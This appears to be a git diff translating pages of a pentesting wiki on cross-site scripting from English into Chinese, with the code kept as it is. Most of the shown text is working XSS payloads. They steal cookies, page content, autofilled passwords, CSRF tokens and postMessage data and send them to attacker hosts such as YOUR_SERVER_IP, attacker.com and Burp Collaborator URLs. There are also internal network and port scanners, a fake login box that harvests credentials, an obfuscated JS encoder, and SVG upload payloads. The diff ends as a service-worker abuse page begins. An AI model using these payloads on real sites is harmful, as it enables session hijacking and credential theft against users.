+(ﾟωﾟﾉ + "_")[ﾟΘﾟ] +
+((ﾟωﾟﾉ == 3) + "_")[ﾟｰﾟ] +
+(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
+((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
+((ﾟｰﾟ == 3) + "_")[ﾟｰﾟ - ﾟΘﾟ] +
+ﾟДﾟ["c"] +
+(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
+ﾟДﾟ["o"] +
+((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ]
 ﾟДﾟ["_"] = (o ^ _ ^ o)[ﾟoﾟ][ﾟoﾟ]
 ﾟεﾟ =
-  ((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
-  ﾟДﾟ.ﾟДﾟﾉ +
-  (ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
-  ((ﾟｰﾟ == 3) + "_")[o ^ _ ^ (o - ﾟΘﾟ)] +
-  ((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
-  (ﾟωﾟﾉ + "_")[ﾟΘﾟ]
+((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
+ﾟДﾟ.ﾟДﾟﾉ +
+(ﾟДﾟ + "_")[ﾟｰﾟ + ﾟｰﾟ] +
+((ﾟｰﾟ == 3) + "_")[o ^ _ ^ (o - ﾟΘﾟ)] +
+((ﾟｰﾟ == 3) + "_")[ﾟΘﾟ] +
+(ﾟωﾟﾉ + "_")[ﾟΘﾟ]
 ﾟｰﾟ += ﾟΘﾟ
 ﾟДﾟ[ﾟεﾟ] = "\\"
 ﾟДﾟ.ﾟΘﾟﾉ = (ﾟДﾟ + ﾟｰﾟ)[o ^ _ ^ (o - ﾟΘﾟ)]
 oﾟｰﾟo = (ﾟωﾟﾉ + "_")[c ^ _ ^ o]
 ﾟДﾟ[ﾟoﾟ] = '"'
 ﾟДﾟ["_"](
-  ﾟДﾟ["_"](
-    ﾟεﾟ +
-      ﾟДﾟ[ﾟoﾟ] +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟｰﾟ +
-      ﾟΘﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟｰﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟｰﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      ((o ^ _ ^ o) - ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      ﾟｰﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      (c ^ _ ^ o) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟｰﾟ +
-      ((o ^ _ ^ o) - ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟΘﾟ +
-      (c ^ _ ^ o) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟｰﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟｰﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟｰﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      (ﾟｰﾟ + (o ^ _ ^ o)) +
-      ﾟДﾟ[ﾟεﾟ] +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟｰﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟｰﾟ +
-      (c ^ _ ^ o) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) - ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟｰﾟ +
-      ﾟΘﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟｰﾟ +
-      ﾟΘﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) - ﾟΘﾟ) +
-      (o ^ _ ^ o) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ﾟｰﾟ +
-      (o ^ _ ^ o) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      ((o ^ _ ^ o) - ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟΘﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      (c ^ _ ^ o) +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟΘﾟ +
-      ((o ^ _ ^ o) + (o ^ _ ^ o)) +
-      ﾟｰﾟ +
-      ﾟДﾟ[ﾟεﾟ] +
-      ﾟｰﾟ +
-      ((o ^ _ ^ o) - ﾟΘﾟ) +
-      ﾟДﾟ[ﾟεﾟ] +
-      (ﾟｰﾟ + ﾟΘﾟ) +
-      ﾟΘﾟ +
-      ﾟДﾟ[ﾟoﾟ]
-  )(ﾟΘﾟ)
+ﾟДﾟ["_"](
+ﾟεﾟ +
+ﾟДﾟ[ﾟoﾟ] +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟｰﾟ +
+ﾟΘﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟｰﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟｰﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+((o ^ _ ^ o) - ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+ﾟｰﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+(ﾟｰﾟ + ﾟΘﾟ) +
+(c ^ _ ^ o) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟｰﾟ +
+((o ^ _ ^ o) - ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟΘﾟ +
+(c ^ _ ^ o) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟｰﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟｰﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟｰﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+(ﾟｰﾟ + (o ^ _ ^ o)) +
+ﾟДﾟ[ﾟεﾟ] +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟｰﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟｰﾟ +
+(c ^ _ ^ o) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟΘﾟ +
+((o ^ _ ^ o) - ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟｰﾟ +
+ﾟΘﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟｰﾟ +
+ﾟΘﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) - ﾟΘﾟ) +
+(o ^ _ ^ o) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+ﾟｰﾟ +
+(o ^ _ ^ o) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+((o ^ _ ^ o) - ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟΘﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+(c ^ _ ^ o) +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟΘﾟ +
+((o ^ _ ^ o) + (o ^ _ ^ o)) +
+ﾟｰﾟ +
+ﾟДﾟ[ﾟεﾟ] +
+ﾟｰﾟ +
+((o ^ _ ^ o) - ﾟΘﾟ) +
+ﾟДﾟ[ﾟεﾟ] +
+(ﾟｰﾟ + ﾟΘﾟ) +
+ﾟΘﾟ +
+ﾟДﾟ[ﾟoﾟ]
+)(ﾟΘﾟ)
 )("_")
 ```
 
 ```javascript
 // It's also possible to execute JS code only with the chars: []`+!${}
 ```
+## XSS 常见有效载荷
 
-## XSS common payloads
-
-### Several payloads in 1
+### 多个有效载荷在 1 中
 
 {{#ref}}
 steal-info-js.md
 {{#endref}}
 
-### Iframe Trap
+### Iframe 陷阱
 
-Make the use navigate in the page without exiting an iframe and steal of his actions (including information sent in forms):
+使用户在页面中导航而不退出 iframe，并窃取其操作（包括在表单中发送的信息）：
 
 {{#ref}}
 ../iframe-traps.md
 {{#endref}}
 
-### Retrieve Cookies
-
+### 检索 Cookies
 ```javascript
 <img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
 <img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
@@ -1379,119 +1272,107 @@ Make the use navigate in the page without exiting an iframe and steal of his act
 <script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
 <script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
 ```
-
 > [!NOTE]
-> You **won't be able to access the cookies from JavaScript** if the HTTPOnly flag is set in the cookie. But here you have [some ways to bypass this protection](../hacking-with-cookies/#httponly) if you are lucky enough.
-
-### Steal Page Content
+> 如果在 cookie 中设置了 HTTPOnly 标志，您 **将无法通过 JavaScript 访问 cookies**。但如果您足够幸运，这里有 [一些绕过此保护的方法](../hacking-with-cookies/#httponly)。
 
+### 偷取页面内容
 ```javascript
 var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
 var attacker = "http://10.10.14.8/exfil"
 var xhr = new XMLHttpRequest()
 xhr.onreadystatechange = function () {
-  if (xhr.readyState == XMLHttpRequest.DONE) {
-    fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
-  }
+if (xhr.readyState == XMLHttpRequest.DONE) {
+fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
+}
 }
 xhr.open("GET", url, true)
 xhr.send(null)
 ```
-
-### Find internal IPs
-
+### 查找内部IP
 ```html
 <script>
-  var q = []
-  var collaboratorURL =
-    "http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
-  var wait = 2000
-  var n_threads = 51
+var q = []
+var collaboratorURL =
+"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
+var wait = 2000
+var n_threads = 51
 
-  // Prepare the fetchUrl functions to access all the possible
-  for (i = 1; i <= 255; i++) {
-    q.push(
-      (function (url) {
-        return function () {
-          fetchUrl(url, wait)
-        }
-      })("http://192.168.0." + i + ":8080")
-    )
-  }
+// Prepare the fetchUrl functions to access all the possible
+for (i = 1; i <= 255; i++) {
+q.push(
+(function (url) {
+return function () {
+fetchUrl(url, wait)
+}
+})("http://192.168.0." + i + ":8080")
+)
+}
 
-  // Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
-  for (i = 1; i <= n_threads; i++) {
-    if (q.length) q.shift()()
-  }
+// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
+for (i = 1; i <= n_threads; i++) {
+if (q.length) q.shift()()
+}
 
-  function fetchUrl(url, wait) {
-    console.log(url)
-    var controller = new AbortController(),
-      signal = controller.signal
-    fetch(url, { signal })
-      .then((r) =>
-        r.text().then((text) => {
-          location =
-            collaboratorURL +
-            "?ip=" +
-            url.replace(/^http:\/\//, "") +
-            "&code=" +
-            encodeURIComponent(text) +
-            "&" +
-            Date.now()
-        })
-      )
-      .catch((e) => {
-        if (!String(e).includes("The user aborted a request") && q.length) {
-          q.shift()()
-        }
-      })
+function fetchUrl(url, wait) {
+console.log(url)
+var controller = new AbortController(),
+signal = controller.signal
+fetch(url, { signal })
+.then((r) =>
+r.text().then((text) => {
+location =
+collaboratorURL +
+"?ip=" +
+url.replace(/^http:\/\//, "") +
+"&code=" +
+encodeURIComponent(text) +
+"&" +
+Date.now()
+})
+)
+.catch((e) => {
+if (!String(e).includes("The user aborted a request") && q.length) {
+q.shift()()
+}
+})
 
-    setTimeout((x) => {
-      controller.abort()
-      if (q.length) {
-        q.shift()()
-      }
-    }, wait)
-  }
+setTimeout((x) => {
+controller.abort()
+if (q.length) {
+q.shift()()
+}
+}, wait)
+}
 </script>
 ```
-
-### Port Scanner (fetch)
-
+### 端口扫描器 (fetch)
 ```javascript
 const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
 ```
-
-### Port Scanner (websockets)
-
+### 端口扫描器 (websockets)
 ```python
 var ports = [80, 443, 445, 554, 3306, 3690, 1234];
 for(var i=0; i<ports.length; i++) {
-    var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
-    s.start = performance.now();
-    s.port = ports[i];
-    s.onerror = function() {
-        console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
-    };
-    s.onopen = function() {
-        console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
-    };
+var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
+s.start = performance.now();
+s.port = ports[i];
+s.onerror = function() {
+console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
+};
+s.onopen = function() {
+console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
+};
 }
 ```
+_短时间表示端口响应_ _较长时间表示没有响应。_
 
-_Short times indicate a responding port_ _Longer times indicate no response._
-
-Review the list of ports banned in Chrome [**here**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) and in Firefox [**here**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).
-
-### Box to ask for credentials
+查看 Chrome 中禁止的端口列表 [**这里**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net_util.cc) 和 Firefox 中的 [**这里**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist)。
 
+### 询问凭据的框
 ```markup
 <style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
 ```
-
-### Auto-fill passwords capture
-
+### 自动填充密码捕获
 ```javascript
 <b>Username:</><br>
 <input name=username id=username>
@@ -1502,20 +1383,18 @@ mode: 'no-cors',
 body:username.value+':'+this.value
 });">
 ```
-
-When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.
+当任何数据被输入到密码字段时，用户名和密码会被发送到攻击者的服务器，即使客户端选择了一个保存的密码而没有输入任何内容，凭据也会被外泄。
 
 ### Keylogger
 
-Just searching in github I found a few different ones:
+仅在 GitHub 上搜索，我找到了几个不同的：
 
 - [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
 - [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
 - [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
-- You can also use metasploit `http_javascript_keylogger`
+- 你也可以使用 metasploit `http_javascript_keylogger`
 
 ### Stealing CSRF tokens
-
 ```javascript
 <script>
 var req = new XMLHttpRequest();
@@ -1523,44 +1402,40 @@ req.onload = handleResponse;
 req.open('get','/email',true);
 req.send();
 function handleResponse() {
-    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
-    var changeReq = new XMLHttpRequest();
-    changeReq.open('post', '/email/change-email', true);
-    changeReq.send('csrf='+token+'&email=test@test.com')
+var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
+var changeReq = new XMLHttpRequest();
+changeReq.open('post', '/email/change-email', true);
+changeReq.send('csrf='+token+'&email=test@test.com')
 };
 </script>
 ```
-
-### Stealing PostMessage messages
-
+### 偷窃 PostMessage 消息
 ```markup
 <img src="https://attacker.com/?" id=message>
 <script>
- window.onmessage = function(e){
- document.getElementById("message").src += "&"+e.data;
+window.onmessage = function(e){
+document.getElementById("message").src += "&"+e.data;
 </script>
 ```
-
-### Abusing Service Workers
+### 滥用服务工作者
 
 {{#ref}}
 abusing-service-workers.md
 {{#endref}}
 
-### Accessing Shadow DOM
+### 访问影子DOM
 
 {{#ref}}
 shadow-dom.md
 {{#endref}}
 
-### Polyglots
+### 多语言混合
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}
 
-### Blind XSS payloads
-
-You can also use: [https://xsshunter.com/](https://xsshunter.com)
+### 盲XSS有效载荷
 
+您还可以使用: [https://xsshunter.com/](https://xsshunter.com)
 ```markup
 "><img src='//domain/xss'>
 "><script src="//domain/xss.js"></script>
@@ -1600,11 +1475,9 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
 <!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
 <div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
 ```
+### Regex - 访问隐藏内容
 
-### Regex - Access Hidden Content
-
-From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
-
+从 [**这篇文章**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) 可以了解到，即使某些值从 JS 中消失，仍然可以在不同对象的 JS 属性中找到它们。例如，REGEX 的输入仍然可以在正则表达式的输入值被移除后找到：
 ```javascript
 // Do regex with flag
 flag = "CTF{FLAG}"
@@ -1618,62 +1491,58 @@ flag = ""
 console.log(RegExp.input)
 console.log(RegExp.rightContext)
 console.log(
-  document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
+document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
 )
 ```
-
-### Brute-Force List
+### 暴力破解列表
 
 {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}
 
-## XSS Abusing other vulnerabilities
+## XSS 利用其他漏洞
 
-### XSS in Markdown
+### Markdown 中的 XSS
 
-Can inject Markdown code that will be renderer? Maybe you you can get XSS! Check:
+可以注入将被渲染的 Markdown 代码吗？也许你可以获得 XSS！检查：
 
 {{#ref}}
 xss-in-markdown.md
 {{#endref}}
 
-### XSS to SSRF
-
-Got XSS on a **site that uses caching**? Try **upgrading that to SSRF** through Edge Side Include Injection with this payload:
+### XSS 到 SSRF
 
+在一个 **使用缓存的网站** 上获得了 XSS？尝试通过边缘侧包含注入将其 **升级到 SSRF**，使用这个有效载荷：
 ```python
 <esi:include src="http://yoursite.com/capture" />
 ```
+使用它来绕过 cookie 限制、XSS 过滤器等更多内容！\
+有关此技术的更多信息，请查看：[**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)。
 
-Use it to bypass cookie restrictions, XSS filters and much more!\
-More information about this technique here: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).
+### 动态创建 PDF 中的 XSS
 
-### XSS in dynamic created PDF
-
-If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
-So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
+如果网页使用用户控制的输入创建 PDF，您可以尝试 **欺骗创建 PDF 的机器人** 使其 **执行任意 JS 代码**。\
+因此，如果 **PDF 创建机器人发现** 某种 **HTML** **标签**，它将会 **解释** 这些标签，您可以 **利用** 这种行为导致 **服务器 XSS**。
 
 {{#ref}}
 server-side-xss-dynamic-pdf.md
 {{#endref}}
 
-If you cannot inject HTML tags it could be worth it to try to **inject PDF data**:
+如果您无法注入 HTML 标签，尝试 **注入 PDF 数据** 可能是值得的：
 
 {{#ref}}
 pdf-injection.md
 {{#endref}}
 
-### XSS in Amp4Email
+### Amp4Email 中的 XSS
 
-AMP, aimed at accelerating web page performance on mobile devices, incorporates HTML tags supplemented by JavaScript to ensure functionality with an emphasis on speed and security. It supports a range of components for various features, accessible via [AMP components](https://amp.dev/documentation/components/?format=websites).
+AMP 旨在加速移动设备上的网页性能，结合了 HTML 标签和 JavaScript，以确保功能性，同时强调速度和安全性。它支持多种组件以实现各种功能，您可以通过 [AMP components](https://amp.dev/documentation/components/?format=websites) 访问。
 
-The [**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.
+[**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) 格式将特定的 AMP 组件扩展到电子邮件中，使收件人能够直接在电子邮件中与内容互动。
 
-Example [**writeup XSS in Amp4Email in Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).
+示例 [**在 Gmail 中的 Amp4Email 的 XSS 写作**](https://adico.me/post/xss-in-gmail-s-amp4email)。
 
-### XSS uploading files (svg)
-
-Upload as an image a file like the following one (from [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
+### XSS 上传文件 (svg)
 
+将以下文件作为图像上传（来自 [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)）：
 ```markup
 Content-Type: multipart/form-data; boundary=---------------------------232181429808
 Content-Length: 574
@@ -1684,17 +1553,17 @@ Content-Type: image/svg+xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
-   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
-   <script type="text/javascript">
-      alert(1);
-   </script>
+<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
+<script type="text/javascript">
+alert(1);
+</script>
 </svg>
 -----------------------------232181429808--
 ```
 
 ```markup
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
-   <script type="text/javascript">alert("XSS")</script>
+<script type="text/javascript">alert("XSS")</script>
 </svg>
 ```
 
@@ -1711,14 +1580,14 @@ alert("XSS");
 
 ```svg
 <svg width="500" height="500"
-  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
-  <circle cx="50" cy="50" r="45" fill="green"
-          id="foo"/>
+xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+<circle cx="50" cy="50" r="45" fill="green"
+id="foo"/>
 
-  <foreignObject width="500" height="500">
-     <iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
-     <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
-  </foreignObject>
+<foreignObject width="500" height="500">
+<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
+<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
+</foreignObject>
 </svg>
 ```
 
@@ -1729,16 +1598,15 @@ alert("XSS");
 ```xml
 <svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
 ```
+找到 **更多 SVG 载荷在** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
 
-Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
-
-## Misc JS Tricks & Relevant Info
+## 杂项 JS 技巧与相关信息
 
 {{#ref}}
 other-js-tricks.md
 {{#endref}}
 
-## XSS resources
+## XSS 资源
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
 - [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list)
@@ -1748,9 +1616,8 @@ other-js-tricks.md
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对 **黑客职业** 感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_要求流利的波兰语书写和口语能力_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
index 48c197187..ab1026137 100644
--- a/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
+++ b/src/pentesting-web/xss-cross-site-scripting/abusing-service-workers.md
@@ -1,110 +1,99 @@
-# Abusing Service Workers
+# 滥用服务工作者
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Basic Information
+## 基本信息
 
-A **service worker** is a script run by your browser in the background, separate from any web page, enabling features that don't require a web page or user interaction, thus enhancing **offline and background processing** capabilities. Detailed information on service workers can be found [here](https://developers.google.com/web/fundamentals/primers/service-workers). By exploiting service workers within a vulnerable web domain, attackers can gain control over the victim's interactions with all pages within that domain.
+**服务工作者**是由浏览器在后台运行的脚本，与任何网页分开，启用不需要网页或用户交互的功能，从而增强**离线和后台处理**能力。有关服务工作者的详细信息可以在[这里](https://developers.google.com/web/fundamentals/primers/service-workers)找到。通过利用脆弱的网络域中的服务工作者，攻击者可以控制受害者与该域内所有页面的交互。
 
-### Checking for Existing Service Workers
+### 检查现有服务工作者
 
-Existing service workers can be checked in the **Service Workers** section of the **Application** tab in **Developer Tools**. Another method is visiting [chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals) for a more detailed view.
+可以在**开发者工具**的**应用程序**选项卡中的**服务工作者**部分检查现有的服务工作者。另一种方法是访问[chrome://serviceworker-internals](https://chromium.googlesource.com/chromium/src/+/main/docs/security/chrome%3A/serviceworker-internals)以获取更详细的视图。
 
-### Push Notifications
+### 推送通知
 
-**Push notification permissions** directly impact a **service worker's** ability to communicate with the server without direct user interaction. If permissions are denied, it limits the service worker's potential to pose a continuous threat. Conversely, granting permissions increases security risks by enabling the reception and execution of potential exploits.
+**推送通知权限**直接影响**服务工作者**与服务器之间在没有直接用户交互的情况下进行通信的能力。如果权限被拒绝，则限制了服务工作者构成持续威胁的潜力。相反，授予权限会增加安全风险，因为这使得接收和执行潜在漏洞成为可能。
 
-## Attack Creating a Service Worker
+## 攻击创建服务工作者
 
-In order to exploit this vulnerability you need to find:
+为了利用此漏洞，您需要找到：
 
-- A way to **upload arbitrary JS** files to the server and a **XSS to load the service worker** of the uploaded JS file
